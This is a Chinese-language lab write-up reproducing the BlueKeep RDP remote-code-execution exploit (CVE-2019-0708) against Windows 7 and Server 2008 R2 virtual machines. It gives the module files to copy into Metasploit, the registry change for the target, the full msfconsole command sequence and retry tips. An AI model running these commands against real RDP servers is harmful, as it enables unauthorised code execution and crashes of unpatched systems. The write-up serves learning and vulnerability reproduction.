CVE-2019-0708:RDP終極EXP復現


0x00 前言

每次復現都會遇到各種各樣的問題,這次也不例外,經過多次嘗試才復現成功,因此把可能的解決方法也和大家分享一下,有想要一起復現學習/投稿的可以聯系我哈

0x01 影響版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Windows 8Windows 10及之后版本的用戶不受此漏洞影響

0x02 環境搭建

環境下載鏈接:

win7 sp1:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

win08 R2:ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/

本次環境:

win7 sp1 - 192.168.10.10

win08 R2 - 192.168.10.6

kali - 192.168.10.9

win7 sp1 准備:

開啟3389

win08 R2准備:

開啟3389

修改注冊表

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0

kali 准備:

將以下鏈接中的4個文件分別放至相應的目錄(kali默認目錄)

https://github.com/TinToSer/bluekeep-exploit

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/

0x03 漏洞利用

msfconsole

reload_all

search 2019_0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhost 192.168.10.10

set rport 3389

set target 3

run

 

win08 R2也是同樣的操作命令

msfconsole

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhost 192.168.10.6

set rport 3389

set target 3

run

 

復現失敗的一些小tip:

1、確認目錄下已經拷貝了相應文件

2、確認3389開啟,msf中reload_all執行

3、kali的內存略微給大一點

4、多run幾次!(重點)

小結:目前exp還很不穩定,建議大家在實戰中暫時不要使用,如果打藍屏可能會造成很嚴重的后果。復現時可能會出現諸多問題,但是只要耐心地多嘗試幾次總會成功的

 

圖形化檢測工具下載Timeline Sec公眾號回復0708

參考鏈接:

 http://www.nmd5.com/?p=409#comment-46

https://github.com/rapid7/metasploit-framework/pull/12283

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM